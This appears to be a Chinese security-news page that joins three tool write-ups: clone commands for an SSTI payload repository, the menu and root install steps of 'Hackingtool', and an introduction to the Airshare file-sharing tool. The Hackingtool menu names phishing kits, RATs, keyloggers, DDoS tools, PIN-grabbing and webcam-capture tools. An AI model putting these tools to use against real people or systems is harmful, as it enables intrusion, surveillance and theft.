

Payload下载

广大研究人员可以使用下列命令将现有Payload集克隆至本地(HTTPS):

[email protected]:~# git clone https://github.com/payloadbox/ssti-payloads.git

广大研究人员可以使用下列命令将现有Payload集克隆至本地(SSH):

[email protected]:~# git clone [email protected]:payloadbox/ssti-payloads.git

项目地址

SSTI-Payloads:【GitHub传送门

参考资料

 

Hackingtool是一款针对渗透测试人员的多合一测试套件,目前该套件可以给广大安全研究人员提供下列菜单内的工具:

-AnonSurf匿名保护工具

-信息收集工具

-密码攻击工具

-无线攻击工具

-SQL注入工具

-网络钓鱼攻击工具

-Web攻击工具

-后渗透工具

-信息取证工具

-Payload创建工具

-路由漏洞利用工具

-WiFi干扰工具

-XSS攻击工具

-逆向工程工具

-社交媒体查询工具

-DDoS攻击工具

-隐写工具

-IDN Homograph攻击工具

-哈希破解工具

-社交媒体攻击工具

-Android攻击工具

-RAT工具

-Web爬虫

-Payload注入工具

-系统更新工具

AnonSurf匿名保护工具

Anonmously Surf

Multitor

信息收集工具

Nmap

Dracnmap

Port Scanning

Host To IP

Xerosploit

Infoga - Email OSINT

ReconSpider

RED HAWK (All In One Scanning)

ReconDog

Striker

SecretFinder

Port Scanner

Breacher

密码攻击工具

Cupp

WordlistCreator

Goblin WordGenerator

Credential reuse attacks

Wordlist (Contain 1.4 Billion Pass)

无线攻击工具

WiFi-Pumpkin

pixiewps

Bluetooth Honeypot GUI Framework

Fluxion

Wifiphisher

Wifite

EvilTwin

SQL注入工具

sqlmap tool

NoSqlMap

Damn Small SQLi Scanner

Explo

Blisqy - Exploit Time-based blind-SQL injection

Leviathan - Wide Range Mass Audit Toolkit

SQLScan

社交媒体攻击工具

Instagram Attack

AllinOne SocialMedia Attack

Facebook Attack

Application Checker

Android攻击工具

Keydroid

MySMS

Lockphish (Grab target LOCK PIN)

DroidCam (Capture Image)

EvilApp (Hijack Session)

网络钓鱼攻击工具

Setoolkit

SocialFish

HiddenEye

Evilginx2

Shellphish

BlackEye

I-See-You(Get Location using phishing attack)

SayCheese (Grab target's Webcam Shots)

QR Code Jacking

Web攻击工具

SlowLoris

Skipfish

SubDomain Finder

CheckURL

Blazy

Sub-Domain TakeOver

后渗透工具

Vegile - Ghost In The Shell

Chrome Keylogger

信息取证工具

Bulk_extractor

Disk Clone and ISO Image Aquire

AutoSpy

Toolsley

Wireshark

Payload生成器

The FatRat*

Brutal

Stitch

MSFvenom Payload Creator

Venom Shellcode Generator

Spycam

Mob-Droid

漏洞利用框架

RouterSploit

WebSploit

Commix

Web2Attack

Fastssh

社交媒体查询工具

Find SocialMedia By Facial Recognation System

Find SocialMedia By UserName

Sherlock

SocialScan

信息隐藏工具

SteganoHide

StegnoCracker

Whitespace

DDoS攻击工具

SlowLoris

SYN Flood DDoS Weapon

UFOnet

GoldenEye

XSS攻击工具

DalFox(Finder of XSS)

XSS Payload Generator

Advanced XSS Detection Suite

Extended XSS Searcher and Finder

XSS-Freak

XSpear

XSSCon

XanXSS

IDN Homograph工具

EvilURL

电子邮件验证工具

KnockMail

哈希破解工具

Hash Buster

工具安装

演示视频:【油管地址

注意:该工具必须以ROOT权限运行!

工具的安装和使用命令如下:

git clone https://github.com/Z4nzu/hackingtool.git

chmod -R 755 hackingtool  

cd hackingtool

sudo pip3 install -r requirement.txt

bash install.sh

sudo hackingtool

按照上述命令输入并执行之后,我们也可以直接在终端窗口执行下列命令来运行Hackingtool:

[email protected]:~ hackingtool

工具运行截图

 

 

 

 

 

项目地址

Hackingtool:【GitHub传送门

项目情况

 

 

 

Airshare介绍

Airshare是一款针对本地网络的跨平台内容共享工具,该工具本质上是一个基于Python的命令行接口工具和模块,它基于aiohttp和zeroconf实现其功能。在Airshare的帮助下,我们可以在本地网络中,利用组播DNS实现两台设备的点对点数据传递/共享。除此之外,它还可以打开一个HTTP网站来与任何非命令行接口的外部接口进行交互。值得一提的是,该工具可以在完全离线的状态下运行。

功能介绍

当前版本的Airshare支持以下强大功能:

  • 在本地网络中快速传输内容。
  • 允许传输纯文本数据,支持从剪贴板发送或接收数据。
  • 支持多个文件、目录和大文件的传输,内容逐块发送,并且完全不涉及内存读写。
  • 支持直接发送剪贴板中路径所指向的文件。
  • 跨平台支持,支持在Linux、Windows和macOS上使用(通过命令行接口或Web接口),而且还支持移动端使用(通过Web接口)。
  • 使用多播DNS服务注册和发现,因此我们可以访问人类可读的代码内容。
  • 可以在其他Python程序中以模块的形式导入和使用。

工具安装

pip安装

$ pip install Airshare

pipx安装

$ pipx install Airshare

Homebrew安装

$ brew install airshare

工具使用

正如前文所述,Airshare支持发送和接收文件或目录。广大用户可以在命令行接口中使用下列命令来实现数据发送:

$ airshare noobmaster requirements.txt

并且在命令行接口中使用下列命令来实现数据接收:

$ airshare noobmaster

除此之外,我们也可以在浏览器中通过访问下列地址来下载共享的数据:

http://noobmaster.local:8000

当然了,我们还可以在任意Python项目中执行import命令来将Airshare以模块的形式导入并使用:

import airshare

已知问题

  • 针对非苹果设备的Link-local域名解析(.local地址)要求Avahi(Linux)或Bonjour(Windows)。
  • Android浏览器并没有内置组播DNS服务目录,无法解析.local地址。因此,工具新增了二维码支持,可以帮助我们轻松访问URL地址。
  • Windows用户要求配置Python环境,并且版本 < 3.8,使用Ctrl + Break组合键(或Ctrl + Fn + B)退出,而不是Ctrl + C。

工具演示样例

GIF:【点我获取

工具演示视频

油管地址:【点我观看

项目地址

Airshare:【GitHub传送门

许可证协议

Airshare项目的开发与发布遵循MIT开源许可证协议。

参考文档